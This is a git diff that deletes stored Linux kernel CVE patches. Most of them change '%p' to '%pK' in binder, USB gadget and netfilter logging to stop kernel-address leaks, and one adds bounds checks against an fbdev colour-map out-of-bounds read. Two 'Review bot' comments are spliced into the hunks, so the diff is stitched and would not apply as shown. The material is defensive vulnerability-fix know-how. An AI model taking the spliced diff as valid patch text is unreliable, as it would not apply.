binder_transaction_buffer_release(struct binder_proc *proc, - struct binder_node *node = binder_get_node(proc, fp->binder); - if (node == NULL) { - printk(KERN_ERR "binder: transaction release %d" -- " bad node %p\n", debug_id, fp->binder); -+ " bad node %pK\n", debug_id, fp->binder); - break; - } - binder_debug(BINDER_DEBUG_TRANSACTION, -- " node %d u%p\n", -+ " node %d u%pK\n", - node->debug_id, node->ptr); - binder_dec_node(node, fp->type == BINDER_TYPE_BINDER, 0); - } break; -@@ -1552,7 +1552,7 @@ static void binder_transaction(struct binder_proc *proc, - if (reply) - binder_debug(BINDER_DEBUG_TRANSACTION, - "binder: %d:%d BC_REPLY %d -> %d:%d, " -- "data %p-%p size %zd-%zd\n", -+ "data %pK-%pK size %zd-%zd\n", - proc->pid, thread->pid, t->debug_id, - target_proc->pid, target_thread->pid, - tr->data.ptr.buffer, tr->data.ptr.offsets, -@@ -1560,7 +1560,7 @@ static void binder_transaction(struct binder_proc *proc, - else - binder_debug(BINDER_DEBUG_TRANSACTION, - "binder: %d:%d BC_TRANSACTION %d -> " -- "%d - node %d, data %p-%p size %zd-%zd\n", -+ "%d - node %d, data %pK-%pK size %zd-%zd\n", - proc->pid, thread->pid, t->debug_id, - target_proc->pid, target_node->debug_id, - tr->data.ptr.buffer, tr->data.ptr.offsets, -@@ -1647,8 +1647,8 @@ static void binder_transaction(struct binder_proc *proc, - node->accept_fds = !!(fp->flags & FLAT_BINDER_FLAG_ACCEPTS_FDS); - } - if (fp->cookie != node->cookie) { -- binder_user_error("binder: %d:%d sending u%p " -- "node %d, cookie mismatch %p != %p\n", -+ binder_user_error("binder: %d:%d sending u%pK " -+ "node %d, cookie mismatch %pK != %pK\n", - proc->pid, thread->pid, - fp->binder, node->debug_id, - fp->cookie, node->cookie); -@@ -1675,7 +1675,7 @@ static void binder_transaction(struct binder_proc *proc, - - trace_binder_transaction_node_to_ref(t, node, ref); - binder_debug(BINDER_DEBUG_TRANSACTION, -- " node %d u%p -> ref %d desc %d\n", -+ " node %d u%pK -> ref %d desc %d\n", - node->debug_id, node->ptr, ref->debug_id, - 
ref->desc); - } break; -@@ -1705,7 +1705,7 @@ static void binder_transaction(struct binder_proc *proc, - binder_inc_node(ref->node, fp->type == BINDER_TYPE_BINDER, 0, NULL); - trace_binder_transaction_ref_to_node(t, ref); - binder_debug(BINDER_DEBUG_TRANSACTION, -- " ref %d desc %d -> node %d u%p\n", -+ " ref %d desc %d -> node %d u%pK\n", - ref->debug_id, ref->desc, ref->node->debug_id, - ref->node->ptr); - } else { -@@ -1941,7 +1941,7 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread, - node = binder_get_node(proc, node_ptr); - if (node == NULL) { - binder_user_error("binder: %d:%d " -- "%s u%p no match\n", -+ "%s u%pK no match\n", - proc->pid, thread->pid, - cmd == BC_INCREFS_DONE ? - "BC_INCREFS_DONE" : -@@ -1950,8 +1950,8 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread, - break; - } - if (cookie != node->cookie) { -- binder_user_error("binder: %d:%d %s u%p node %d" -- " cookie mismatch %p != %p\n", -+ binder_user_error("binder: %d:%d %s u%pK node %d" -+ " cookie mismatch %pK != %pK\n", - proc->pid, thread->pid, - cmd == BC_INCREFS_DONE ? - "BC_INCREFS_DONE" : "BC_ACQUIRE_DONE", -@@ -2006,19 +2006,19 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread, - buffer = binder_buffer_lookup(proc, data_ptr); - if (buffer == NULL) { - binder_user_error("binder: %d:%d " -- "BC_FREE_BUFFER u%p no match\n", -+ "BC_FREE_BUFFER u%pK no match\n", - proc->pid, thread->pid, data_ptr); - break; - } - if (!buffer->allow_user_free) { - binder_user_error("binder: %d:%d " -- "BC_FREE_BUFFER u%p matched " -+ "BC_FREE_BUFFER u%pK matched " - "unreturned buffer\n", - proc->pid, thread->pid, data_ptr); - break; - } - binder_debug(BINDER_DEBUG_FREE_BUFFER, -- "binder: %d:%d BC_FREE_BUFFER u%p found buffer %d for %s transaction\n", -+ "binder: %d:%d BC_FREE_BUFFER u%pK found buffer %d for %s transaction\n", - proc->pid, thread->pid, data_ptr, buffer->debug_id, - buffer->transaction ? 
"active" : "finished"); - -@@ -2118,7 +2118,7 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread, - } - - binder_debug(BINDER_DEBUG_DEATH_NOTIFICATION, -- "binder: %d:%d %s %p ref %d desc %d s %d w %d for node %d\n", -+ "binder: %d:%d %s %pK ref %d desc %d s %d w %d for node %d\n", - proc->pid, thread->pid, - cmd == BC_REQUEST_DEATH_NOTIFICATION ? - "BC_REQUEST_DEATH_NOTIFICATION" : -@@ -2172,7 +2172,7 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread, - "d BC_CLEAR_DEATH_NOTIFI" - "CATION death notificat" - "ion cookie mismatch " -- "%p != %p\n", -+ "%pK != %pK\n", - proc->pid, thread->pid, - death->cookie, cookie); - break; -@@ -2208,11 +2208,11 @@ int binder_thread_write(struct binder_proc *proc, struct binder_thread *thread, - } - } - binder_debug(BINDER_DEBUG_DEAD_BINDER, -- "binder: %d:%d BC_DEAD_BINDER_DONE %p found %p\n", -+ "binder: %d:%d BC_DEAD_BINDER_DONE %pK found %pK\n", - proc->pid, thread->pid, cookie, death); - if (death == NULL) { - binder_user_error("binder: %d:%d BC_DEAD" -- "_BINDER_DONE %p not found\n", -+ "_BINDER_DONE %pK not found\n", - proc->pid, thread->pid, cookie); - break; - } -@@ -2423,13 +2423,13 @@ retry: - - binder_stat_br(proc, thread, cmd); - binder_debug(BINDER_DEBUG_USER_REFS, -- "binder: %d:%d %s %d u%p c%p\n", -+ "binder: %d:%d %s %d u%pK c%pK\n", - proc->pid, thread->pid, cmd_name, node->debug_id, node->ptr, node->cookie); - } else { - list_del_init(&w->entry); - if (!weak && !strong) { - binder_debug(BINDER_DEBUG_INTERNAL_REFS, -- "binder: %d:%d node %d u%p c%p deleted\n", -+ "binder: %d:%d node %d u%pK c%pK deleted\n", - proc->pid, thread->pid, node->debug_id, - node->ptr, node->cookie); - rb_erase(&node->rb_node, &proc->nodes); -@@ -2437,7 +2437,7 @@ retry: - binder_stats_deleted(BINDER_STAT_NODE); - } else { - binder_debug(BINDER_DEBUG_INTERNAL_REFS, -- "binder: %d:%d node %d u%p c%p state unchanged\n", -+ "binder: %d:%d node %d u%pK c%pK state unchanged\n", 
- proc->pid, thread->pid, node->debug_id, node->ptr, - node->cookie); - } -@@ -2462,7 +2462,7 @@ retry: - ptr += sizeof(void *); - binder_stat_br(proc, thread, cmd); - binder_debug(BINDER_DEBUG_DEATH_NOTIFICATION, -- "binder: %d:%d %s %p\n", -+ "binder: %d:%d %s %pK\n", - proc->pid, thread->pid, - cmd == BR_DEAD_BINDER ? - "BR_DEAD_BINDER" : -@@ -2532,7 +2532,7 @@ retry: - binder_stat_br(proc, thread, cmd); - binder_debug(BINDER_DEBUG_TRANSACTION, - "binder: %d:%d %s %d %d:%d, cmd %d" -- "size %zd-%zd ptr %p-%p\n", -+ "size %zd-%zd ptr %pK-%pK\n", - proc->pid, thread->pid, - (cmd == BR_TRANSACTION) ? "BR_TRANSACTION" : - "BR_REPLY", -@@ -2609,7 +2609,7 @@ static void binder_release_work(struct list_head *list) - - death = container_of(w, struct binder_ref_death, work); - binder_debug(BINDER_DEBUG_DEAD_TRANSACTION, -- "binder: undelivered death notification, %p\n", -+ "binder: undelivered death notification, %pK\n", - death->cookie); - kfree(death); - binder_stats_deleted(BINDER_STAT_DEATH); -@@ -2942,7 +2942,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma) - #ifdef CONFIG_CPU_CACHE_VIPT - if (cache_is_vipt_aliasing()) { - while (CACHE_COLOUR((vma->vm_start ^ (uint32_t)proc->buffer))) { -- printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %p bad alignment\n", proc->pid, vma->vm_start, vma->vm_end, proc->buffer); -+ printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %pK bad alignment\n", proc->pid, vma->vm_start, vma->vm_end, proc->buffer); - vma->vm_start += PAGE_SIZE; - } - } -@@ -2974,7 +2974,7 @@ static int binder_mmap(struct file *filp, struct vm_area_struct *vma) - proc->vma = vma; - proc->vma_vm_mm = vma->vm_mm; - -- /*printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %p\n", -+ /*printk(KERN_INFO "binder_mmap: %d %lx-%lx maps %pK\n", - proc->pid, vma->vm_start, vma->vm_end, proc->buffer);*/ - return 0; - -@@ -3168,7 +3168,7 @@ static void binder_deferred_release(struct binder_proc *proc) - void *page_addr = proc->buffer + i * PAGE_SIZE; - 
binder_debug(BINDER_DEBUG_BUFFER_ALLOC, - "binder_release: %d: " -- "page %d at %p not freed\n", -+ "page %d at %pK not freed\n", - proc->pid, i, - page_addr); - unmap_kernel_range((unsigned long)page_addr, -@@ -3251,7 +3251,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix, - struct binder_transaction *t) - { - seq_printf(m, -- "%s %d: %p from %d:%d to %d:%d code %x flags %x pri %ld r%d", -+ "%s %d: %pK from %d:%d to %d:%d code %x flags %x pri %ld r%d", - prefix, t->debug_id, t, - t->from ? t->from->proc->pid : 0, - t->from ? t->from->pid : 0, -@@ -3265,7 +3265,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix, - if (t->buffer->target_node) - seq_printf(m, " node %d", - t->buffer->target_node->debug_id); -- seq_printf(m, " size %zd:%zd data %p\n", -+ seq_printf(m, " size %zd:%zd data %pK\n", - t->buffer->data_size, t->buffer->offsets_size, - t->buffer->data); - } -@@ -3273,7 +3273,7 @@ static void print_binder_transaction(struct seq_file *m, const char *prefix, - static void print_binder_buffer(struct seq_file *m, const char *prefix, - struct binder_buffer *buffer) - { -- seq_printf(m, "%s %d: %p size %zd:%zd %s\n", -+ seq_printf(m, "%s %d: %pK size %zd:%zd %s\n", - prefix, buffer->debug_id, buffer->data, - buffer->data_size, buffer->offsets_size, - buffer->transaction ? 
"active" : "delivered"); -@@ -3296,7 +3296,7 @@ static void print_binder_work(struct seq_file *m, const char *prefix, - break; - case BINDER_WORK_NODE: - node = container_of(w, struct binder_node, work); -- seq_printf(m, "%snode work %d: u%p c%p\n", -+ seq_printf(m, "%snode work %d: u%pK c%pK\n", - prefix, node->debug_id, node->ptr, node->cookie); - break; - case BINDER_WORK_DEAD_BINDER: -@@ -3358,7 +3358,7 @@ static void print_binder_node(struct seq_file *m, struct binder_node *node) - hlist_for_each_entry(ref, pos, &node->refs, node_entry) - count++; - -- seq_printf(m, " node %d: u%p c%p hs %d hw %d ls %d lw %d is %d iw %d", -+ seq_printf(m, " node %d: u%pK c%pK hs %d hw %d ls %d lw %d is %d iw %d", - node->debug_id, node->ptr, node->cookie, - node->has_strong_ref, node->has_weak_ref, - node->local_strong_refs, node->local_weak_refs, --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch deleted file mode 100644 index 900b5337..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch +++ /dev/null 
@@ -1,111 +0,0 @@ -diff --git a/drivers/usb/gadget/u_data_hsic.c b/drivers/usb/gadget/u_data_hsic.c -index ec13488..469a7a0 100644 ---- a/drivers/usb/gadget/u_data_hsic.c -+++ b/drivers/usb/gadget/u_data_hsic.c -@@ -172,7 +172,7 @@ - struct usb_request *req; - unsigned long flags; - -- pr_debug("%s: ep:%s head:%p num:%d cb:%p", __func__, -+ pr_debug("%s: ep:%s head:%pK num:%d cb:%pK", __func__, - ep->name, head, num, cb); - - for (i = 0; i < num; i++) { -@@ -289,7 +289,7 @@ - return -ENOTCONN; - } - -- pr_debug("%s: p:%p#%d skb_len:%d\n", __func__, -+ pr_debug("%s: p:%pK#%d skb_len:%d\n", __func__, - port, port->port_num, skb->len); - - spin_lock_irqsave(&port->tx_lock, flags); -@@ -333,7 +333,7 @@ - } - - while ((skb = __skb_dequeue(&port->rx_skb_q))) { -- pr_debug("%s: port:%p tom:%lu pno:%d\n", __func__, -+ pr_debug("%s: port:%pK tom:%lu pno:%d\n", __func__, - port, port->to_modem, port->port_num); - - info = (struct timestamp_info *)skb->cb; -@@ -441,7 +441,7 @@ - struct timestamp_info *info; - unsigned int created; - -- pr_debug("%s: port:%p\n", __func__, port); -+ pr_debug("%s: port:%pK\n", __func__, port); - if (!port) - return; - -@@ -498,7 +498,7 @@ - struct usb_ep *ep_out, *ep_in; - int ret; - -- pr_debug("%s: port:%p\n", __func__, port); -+ pr_debug("%s: port:%pK\n", __func__, port); - - if (!port) - return; -@@ -545,7 +545,7 @@ - struct gdata_port *port = - container_of(w, struct gdata_port, connect_w); - int ret; -- printk("%s: connected=%d, CH_READY=%d, port=%p\n", -+ printk("%s: connected=%d, CH_READY=%d, port=%pK\n", - __func__, atomic_read(&port->connected), - test_bit(CH_READY, &port->bridge_sts), port); - if (!port || !atomic_read(&port->connected) || -@@ -554,7 +554,7 @@ - return; - } - -- pr_debug("%s: port:%p\n", __func__, port); -+ pr_debug("%s: port:%pK\n", __func__, port); - - ret = data_bridge_open(&port->brdg); - if (ret) { -@@ -746,7 +746,7 @@ - - platform_driver_register(pdrv); - -- pr_debug("%s: port:%p portno:%d\n", __func__, port, 
port_num); -+ pr_debug("%s: port:%pK portno:%d\n", __func__, port, port_num); - - return 0; - } -@@ -855,14 +855,14 @@ - - ret = usb_ep_enable(port->in); - if (ret) { -- pr_err("%s: usb_ep_enable failed eptype:IN ep:%p", -+ pr_err("%s: usb_ep_enable failed eptype:IN ep:%pK", - __func__, port->in); - goto fail; - } - - ret = usb_ep_enable(port->out); - if (ret) { -- pr_err("%s: usb_ep_enable failed eptype:OUT ep:%p", -+ pr_err("%s: usb_ep_enable failed eptype:OUT ep:%pK", - __func__, port->out); - usb_ep_disable(port->in); - goto fail; -@@ -938,7 +938,7 @@ - write_lock_irqsave(&dbg_data.lck, flags); - - scnprintf(dbg_data.buf[dbg_data.idx], DBG_DATA_MSG, -- "%p %u[%s] %u %u %u %u %u %u\n", -+ "%pK %u[%s] %u %u %u %u %u %u\n", - skb, skb->len, event, info->created, info->rx_queued, - info->rx_done, info->rx_done_sent, info->tx_queued, - get_timestamp()); -@@ -1012,7 +1012,7 @@ - spin_lock_irqsave(&port->rx_lock, flags); - temp += scnprintf(buf + temp, DEBUG_BUF_SIZE - temp, - "\nName: %s\n" -- "#PORT:%d port#: %p\n" -+ "#PORT:%d port#: %pK\n" - "data_ch_open: %d\n" - "data_ch_ready: %d\n" - "\n******UL INFO*****\n\n" diff --git a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch.base64 deleted file mode 100644 index 3dfd3895..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8403/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2016-8404/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8404/ANY/0001.patch deleted file mode 100644 index e5256268..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8404/ANY/0001.patch +++ /dev/null 
@@ -1,32 +0,0 @@
-From 232ec805c7cc4150f05aa06a98335378ab272ec7 Mon Sep 17 00:00:00 2001
-From: chengengjia
-Date: Wed, 14 Sep 2016 14:10:56 +0800
-Subject: usb: diag: prevent showing the address of kernel variable 'port'
-
-The format specifier %p can leak kernel address while not valuing the kptr_strict system settings.
-The fix is designed to use %pK instead of %p, which also evaluates whether kptr_restrict is set.
-
-Signed-off-by: chengengjia
-Test: compile
-Bug: 31496950
-Change-Id: Ib93c0defdd68f4afe46b5a818ce4d1a2b850cf46
----
- drivers/usb/gadget/u_ctrl_hsic.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/u_ctrl_hsic.c b/drivers/usb/gadget/u_ctrl_hsic.c
-index ff3fbf3..1c5f160 100644
---- a/drivers/usb/gadget/u_ctrl_hsic.c
-+++ b/drivers/usb/gadget/u_ctrl_hsic.c
-@@ -557,7 +557,7 @@ static ssize_t gctrl_read_stats(struct file *file, char __user *ubuf,
-
- temp += scnprintf(buf + temp, DEBUG_BUF_SIZE - temp,
- "\nName: %s\n"
-- "#PORT:%d port: %p\n"
-+ "#PORT:%d port: %pK\n"
- "to_usbhost: %lu\n"
- "to_modem: %lu\n"
- "cpkt_drp_cnt: %lu\n"
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8405/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8405/ANY/0001.patch
deleted file mode 100644
index a1219b3b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8405/ANY/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@ -From 2dc705a9930b4806250fbf5a76e55266e59389f2 Mon Sep 17 00:00:00 2001 -From: Kees Cook -Date: Tue, 24 Jan 2017 15:18:24 -0800 -Subject: fbdev: color map copying bounds checking - -Copying color maps to userspace doesn't check the value of to->start, -which will cause kernel heap buffer OOB read due to signedness wraps. - -CVE-2016-8405 - -Link: http://lkml.kernel.org/r/20170105224249.GA50925@beast -Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2") -Signed-off-by: Kees Cook -Reported-by: Peter Pi (@heisecode) of Trend Micro -Cc: Min Chong -Cc: Dan Carpenter -Cc: Tomi Valkeinen -Cc: Bartlomiej Zolnierkiewicz -Cc: -Signed-off-by: Andrew Morton -Signed-off-by: Linus Torvalds ---- - drivers/video/fbdev/core/fbcmap.c | 26 ++++++++++++++------------ - 1 file changed, 14 insertions(+), 12 deletions(-) - -diff --git a/drivers/video/fbdev/core/fbcmap.c b/drivers/video/fbdev/core/fbcmap.c -index f89245b..68a1135 100644 ---- a/drivers/video/fbdev/core/fbcmap.c -+++ b/drivers/video/fbdev/core/fbcmap.c -@@ -163,17 +163,18 @@ void fb_dealloc_cmap(struct fb_cmap *cmap) - - int fb_copy_cmap(const struct fb_cmap *from, struct fb_cmap *to) - { -- int tooff = 0, fromoff = 0; -- int size; -+ unsigned int tooff = 0, fromoff = 0; -+ size_t size; - - if (to->start > from->start) - fromoff = to->start - from->start; - else - tooff = from->start - to->start; -- size = to->len - tooff; -- if (size > (int) (from->len - fromoff)) -- size = from->len - fromoff; -- if (size <= 0) -+ if (fromoff >= from->len || tooff >= to->len) -+ return -EINVAL; -+ -+ size = min_t(size_t, to->len - tooff, from->len - fromoff); -+ if (size == 0) - return -EINVAL; - size *= sizeof(u16); - -@@ -187,17 +188,18 @@ int fb_copy_cmap(const struct fb_cmap *from, struct fb_cmap *to) - - int fb_cmap_to_user(const struct fb_cmap *from, struct fb_cmap_user *to) - { -- int tooff = 0, fromoff = 0; -- int size; -+ unsigned int tooff = 0, fromoff = 0; -+ size_t size; - - if (to->start > from->start) - fromoff = 
to->start - from->start; - else - tooff = from->start - to->start; -- size = to->len - tooff; -- if (size > (int) (from->len - fromoff)) -- size = from->len - fromoff; -- if (size <= 0) -+ if (fromoff >= from->len || tooff >= to->len) -+ return -EINVAL; -+ -+ size = min_t(size_t, to->len - tooff, from->len - fromoff); -+ if (size == 0) - return -EINVAL; - size *= sizeof(u16); - --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-8406/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8406/ANY/0001.patch deleted file mode 100644 index 1ef84511..00000000 --- a/Patches/Linux_CVEs/CVE-2016-8406/ANY/0001.patch +++ /dev/null 
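Review bot: In both the fb_copy_cmap and fb_cmap_to_user hunks the `if (size == 0)` test after `min_t()` can no longer fire, because the new guard `if (fromoff >= from->len || tooff >= to->len)` has already returned and both differences are therefore at least 1 (assuming `len` is unsigned, as the comparison implies). The dead branch is harmless but obscures which check actually enforces the bound; I would drop it and comment the guard instead, for example `/* offsets are unsigned: reject before subtracting so size cannot wrap */`. The two functions now repeat the same offset arithmetic, so a small static helper returning the byte count would keep the copies from drifting apart. Both function bodies continue past their hunks, so the copy calls that consume `size` are not visible here.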
@@ -1,102 +0,0 @@ -From d7a15270ad80aff21d09aaea9c0e98e03e541b50 Mon Sep 17 00:00:00 2001 -From: Min Chong -Date: Thu, 13 Oct 2016 17:15:35 -0700 -Subject: [PATCH] netfilter: Change %p to %pK in debug messages - -The format specifier %p can leak kernel addresses -while not valuing the kptr_restrict system settings. -Use %pK instead of %p, which also evaluates whether -kptr_restrict is set. - -Bug: 31796940 -Change-Id: Ia2946d6b493126d68281f97778faf578247f088e -Signed-off-by: Min Chong ---- - net/netfilter/nf_conntrack_core.c | 20 ++++++++++---------- - 1 file changed, 10 insertions(+), 10 deletions(-) - -diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c -index 1c118edd4b794..d9b86c2e96e24 100644 ---- a/net/netfilter/nf_conntrack_core.c -+++ b/net/netfilter/nf_conntrack_core.c -@@ -188,7 +188,7 @@ EXPORT_SYMBOL_GPL(nf_ct_invert_tuple); - static void - clean_from_lists(struct nf_conn *ct) - { -- pr_debug("clean_from_lists(%p)\n", ct); -+ pr_debug("clean_from_lists(%pK)\n", ct); - hlist_nulls_del_rcu(&ct->tuplehash[IP_CT_DIR_ORIGINAL].hnnode); - hlist_nulls_del_rcu(&ct->tuplehash[IP_CT_DIR_REPLY].hnnode); - -@@ -203,7 +203,7 @@ destroy_conntrack(struct nf_conntrack *nfct) - struct net *net = nf_ct_net(ct); - struct nf_conntrack_l4proto *l4proto; - -- pr_debug("destroy_conntrack(%p)\n", ct); -+ pr_debug("destroy_conntrack(%pK)\n", ct); - NF_CT_ASSERT(atomic_read(&nfct->use) == 0); - NF_CT_ASSERT(!timer_pending(&ct->timeout)); - -@@ -234,7 +234,7 @@ destroy_conntrack(struct nf_conntrack *nfct) - if (ct->master) - nf_ct_put(ct->master); - -- pr_debug("destroy_conntrack: returning ct=%p to slab\n", ct); -+ pr_debug("destroy_conntrack: returning ct=%pK to slab\n", ct); - nf_conntrack_free(ct); - } - -@@ -496,7 +496,7 @@ __nf_conntrack_confirm(struct sk_buff *skb) - /* No external references means no one else could have - confirmed us. 
*/ - NF_CT_ASSERT(!nf_ct_is_confirmed(ct)); -- pr_debug("Confirming conntrack %p\n", ct); -+ pr_debug("Confirming conntrack %pK\n", ct); - - spin_lock_bh(&nf_conntrack_lock); - -@@ -826,7 +826,7 @@ init_conntrack(struct net *net, struct nf_conn *tmpl, - spin_lock_bh(&nf_conntrack_lock); - exp = nf_ct_find_expectation(net, zone, tuple); - if (exp) { -- pr_debug("conntrack: expectation arrives ct=%p exp=%p\n", -+ pr_debug("conntrack: expectation arrives ct=%pK exp=%pK\n", - ct, exp); - /* Welcome, Mr. Bond. We've been expecting you... */ - __set_bit(IPS_EXPECTED_BIT, &ct->status); -@@ -916,14 +916,14 @@ resolve_normal_ct(struct net *net, struct nf_conn *tmpl, - } else { - /* Once we've had two way comms, always ESTABLISHED. */ - if (test_bit(IPS_SEEN_REPLY_BIT, &ct->status)) { -- pr_debug("nf_conntrack_in: normal packet for %p\n", ct); -+ pr_debug("nf_conntrack_in: normal packet for %pK\n", ct); - *ctinfo = IP_CT_ESTABLISHED; - } else if (test_bit(IPS_EXPECTED_BIT, &ct->status)) { -- pr_debug("nf_conntrack_in: related packet for %p\n", -+ pr_debug("nf_conntrack_in: related packet for %pK\n", - ct); - *ctinfo = IP_CT_RELATED; - } else { -- pr_debug("nf_conntrack_in: new packet for %p\n", ct); -+ pr_debug("nf_conntrack_in: new packet for %pK\n", ct); - *ctinfo = IP_CT_NEW; - } - *set_reply = 0; -@@ -1065,7 +1065,7 @@ void nf_conntrack_alter_reply(struct nf_conn *ct, - /* Should be unconfirmed, so not in hash table yet */ - NF_CT_ASSERT(!nf_ct_is_confirmed(ct)); - -- pr_debug("Altering reply tuple of %p to ", ct); -+ pr_debug("Altering reply tuple of %pK to ", ct); - nf_ct_dump_tuple(newreply); - - ct->tuplehash[IP_CT_DIR_REPLY].tuple = *newreply; -@@ -1640,7 +1640,7 @@ int nf_conntrack_init_net(struct net *net) - goto err_stat; - } - -- net->ct.slabname = kasprintf(GFP_KERNEL, "nf_conntrack_%p", net); -+ net->ct.slabname = kasprintf(GFP_KERNEL, "nf_conntrack_%pK", net); - if (!net->ct.slabname) { - ret = -ENOMEM; - goto err_slabname; 
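Review bot: The last hunk, in nf_conntrack_init_net, converts the `kasprintf()` that builds `net->ct.slabname`, and that string is an object name rather than a log message. `%pK` can print as all zeros when kptr_restrict is in force, so every network namespace may end up with the same `nf_conntrack_...` name where `%p` gave each one a distinct name; how the name is consumed is outside the hunk, so the impact is inferred. A per-namespace value that is not a pointer keeps the name unique without exposing an address, e.g. `kasprintf(GFP_KERNEL, "nf_conntrack_%u", seq)` with `seq` a counter that would have to be added (placeholder name). The pr_debug() conversions in the other hunks are fine as they are.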
diff --git a/Patches/Linux_CVEs/CVE-2016-8407/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8407/ANY/0001.patch
deleted file mode 100644
index 7d41297b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8407/ANY/0001.patch
+++ /dev/null
@@ -1,157 +0,0 @@ -From c01b4ad61a7e4291ea3db18baaf6c3532eff7e38 Mon Sep 17 00:00:00 2001 -From: Min Chong -Date: Fri, 14 Oct 2016 13:38:11 -0700 -Subject: [PATCH] usb: gadget: f_mbim: Change %p to %pK in debug messages - -The format specifier %p can leak kernel addresses -while not valuing the kptr_restrict system settings. -Use %pK instead of %p, which also evaluates whether -kptr_restrict is set. - -Bug: 31802656 -Change-Id: I74e83192e0379586469edba3c7579a1cd75cf3c0 -Signed-off-by: Min Chong ---- - drivers/usb/gadget/f_mbim.c | 34 +++++++++++++++++----------------- - 1 file changed, 17 insertions(+), 17 deletions(-) - -diff --git a/drivers/usb/gadget/f_mbim.c b/drivers/usb/gadget/f_mbim.c -index d1d10e07eb8db..797756dc46548 100644 ---- a/drivers/usb/gadget/f_mbim.c -+++ b/drivers/usb/gadget/f_mbim.c -@@ -589,24 +589,24 @@ static void fmbim_ctrl_response_available(struct f_mbim *dev) - unsigned long flags; - int ret; - -- pr_debug("dev:%p portno#%d\n", dev, dev->port_num); -+ pr_debug("dev:%pK portno#%d\n", dev, dev->port_num); - - spin_lock_irqsave(&dev->lock, flags); - - if (!atomic_read(&dev->online)) { -- pr_err("dev:%p is not online\n", dev); -+ pr_err("dev:%pK is not online\n", dev); - spin_unlock_irqrestore(&dev->lock, flags); - return; - } - - if (!req) { -- pr_err("dev:%p req is NULL\n", dev); -+ pr_err("dev:%pK req is NULL\n", dev); - spin_unlock_irqrestore(&dev->lock, flags); - return; - } - - if (!req->buf) { -- pr_err("dev:%p req->buf is NULL\n", dev); -+ pr_err("dev:%pK req->buf is NULL\n", dev); - spin_unlock_irqrestore(&dev->lock, flags); - return; - } -@@ -645,21 +645,21 @@ fmbim_send_cpkt_response(struct f_mbim *gr, struct ctrl_pkt *cpkt) - unsigned long flags; - - if (!gr || !cpkt) { -- pr_err("Invalid cpkt, dev:%p cpkt:%p\n", -+ pr_err("Invalid cpkt, dev:%pK cpkt:%pK\n", - gr, cpkt); - return -ENODEV; - } - -- pr_debug("dev:%p port_num#%d\n", dev, dev->port_num); -+ pr_debug("dev:%pK port_num#%d\n", dev, dev->port_num); - - if 
(!atomic_read(&dev->online)) { -- pr_err("dev:%p is not connected\n", dev); -+ pr_err("dev:%pK is not connected\n", dev); - mbim_free_ctrl_pkt(cpkt); - return 0; - } - - if (dev->not_port.notify_state != MBIM_NOTIFY_RESPONSE_AVAILABLE) { -- pr_err("dev:%p state=%d, recover!!\n", dev, -+ pr_err("dev:%pK state=%d, recover!!\n", dev, - dev->not_port.notify_state); - mbim_free_ctrl_pkt(cpkt); - return 0; -@@ -700,7 +700,7 @@ static int mbim_bam_connect(struct f_mbim *dev) - enum peer_bam bam_name = (dev->xport == USB_GADGET_XPORT_BAM2BAM_IPA) ? - IPA_P_BAM : A2_P_BAM; - -- pr_info("dev:%p portno:%d\n", dev, dev->port_num); -+ pr_info("dev:%pK portno:%d\n", dev, dev->port_num); - - src_connection_idx = usb_bam_get_connection_idx(gadget->name, bam_name, - USB_TO_PEER_PERIPHERAL, USB_BAM_DEVICE, dev->port_num); -@@ -727,7 +727,7 @@ static int mbim_bam_connect(struct f_mbim *dev) - - static int mbim_bam_disconnect(struct f_mbim *dev) - { -- pr_info("%s - dev:%p port:%d\n", __func__, dev, dev->port_num); -+ pr_info("%s - dev:%pK port:%d\n", __func__, dev, dev->port_num); - bam_data_disconnect(&dev->bam_port, dev->port_num); - - return 0; -@@ -862,7 +862,7 @@ static void mbim_notify_complete(struct usb_ep *ep, struct usb_request *req) - struct f_mbim *mbim = req->context; - struct usb_cdc_notification *event = req->buf; - -- pr_debug("dev:%p\n", mbim); -+ pr_debug("dev:%pK\n", mbim); - - spin_lock(&mbim->lock); - switch (req->status) { -@@ -892,7 +892,7 @@ static void mbim_notify_complete(struct usb_ep *ep, struct usb_request *req) - mbim_do_notify(mbim); - spin_unlock(&mbim->lock); - -- pr_debug("dev:%p Exit\n", mbim); -+ pr_debug("dev:%pK Exit\n", mbim); - } - - static void mbim_ep0out_complete(struct usb_ep *ep, struct usb_request *req) -@@ -903,7 +903,7 @@ static void mbim_ep0out_complete(struct usb_ep *ep, struct usb_request *req) - struct f_mbim *mbim = func_to_mbim(f); - struct mbim_ntb_input_size *ntb = NULL; - -- pr_debug("dev:%p\n", mbim); -+ pr_debug("dev:%pK\n", 
